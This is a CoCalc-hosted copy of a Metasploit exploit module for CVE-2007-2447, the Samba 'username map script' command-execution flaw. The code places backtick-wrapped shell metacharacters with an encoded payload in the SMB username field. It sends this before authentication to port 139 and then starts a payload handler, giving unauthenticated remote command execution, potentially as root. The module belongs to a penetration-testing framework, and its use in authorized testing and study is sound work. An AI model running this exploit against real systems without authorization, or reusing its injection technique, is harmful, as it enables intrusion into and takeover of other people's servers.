Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/samba/usermap_script.rb
19778 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::SMB::Client

10


11
  # For our customized version of session_setup_no_ntlmssp

12
  CONST = Rex::Proto::SMB::Constants

13
  CRYPT = Rex::Proto::SMB::Crypt

14


15
  def initialize(info = {})

16
    super(

17
      update_info(

18
        info,

19
        'Name' => 'Samba "username map script" Command Execution',

20
        'Description' => %q{

21
          This module exploits a command execution vulnerability in Samba

22
          versions 3.0.20 through 3.0.25rc3 when using the non-default

23
          "username map script" configuration option. By specifying a username

24
          containing shell meta characters, attackers can execute arbitrary

25
          commands.

26


27
          No authentication is needed to exploit this vulnerability since

28
          this option is used to map usernames prior to authentication!

29
        },

30
        'Author' => [ 'jduck' ],

31
        'License' => MSF_LICENSE,

32
        'References' => [

33
          [ 'CVE', '2007-2447' ],

34
          [ 'OSVDB', '34700' ],

35
          [ 'BID', '23972' ],

36
          [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534' ],

37
          [ 'URL', 'http://samba.org/samba/security/CVE-2007-2447.html' ]

38
        ],

39
        'Platform' => ['unix'],

40
        'Arch' => ARCH_CMD,

41
        'Privileged' => true, # root or nobody user

42
        'Payload' => {

43
          'Space' => 1024,

44
          'DisableNops' => true,

45
          'Compat' =>

46
                        {

47
                          'PayloadType' => 'cmd',

48
                          # *_perl and *_ruby work if they are installed

49
                          # mileage may vary from system to system..

50
                        }

51
        },

52
        'Targets' => [

53
          [ "Automatic", {} ]

54
        ],

55
        'DefaultTarget' => 0,

56
        'DisclosureDate' => '2007-05-14',

57
        'Notes' => {

58
          'Reliability' => UNKNOWN_RELIABILITY,

59
          'Stability' => UNKNOWN_STABILITY,

60
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

61
        }

62
      )

63
    )

64


65
    register_options(

66
      [

67
        Opt::RPORT(139)

68
      ]

69
    )

70


71
    deregister_options('SMB::ProtocolVersion')

72
  end

73


74
  def exploit

75
    vprint_status('Use Rex client (SMB1 only) since this module is not compatible with RubySMB client')

76
    connect(versions: [1])

77


78
    # lol?

79
    username = "/=`nohup " + payload.encoded + "`"

80
    begin

81
      simple.client.negotiate(false)

82
      simple.client.session_setup_no_ntlmssp(username, rand_text(16), datastore['SMBDomain'], false)

83
    rescue ::Timeout::Error, XCEPT::LoginError

84
      # nothing, it either worked or it didn't ;)

85
    end

86


87
    handler

88
  end

89
end

90


91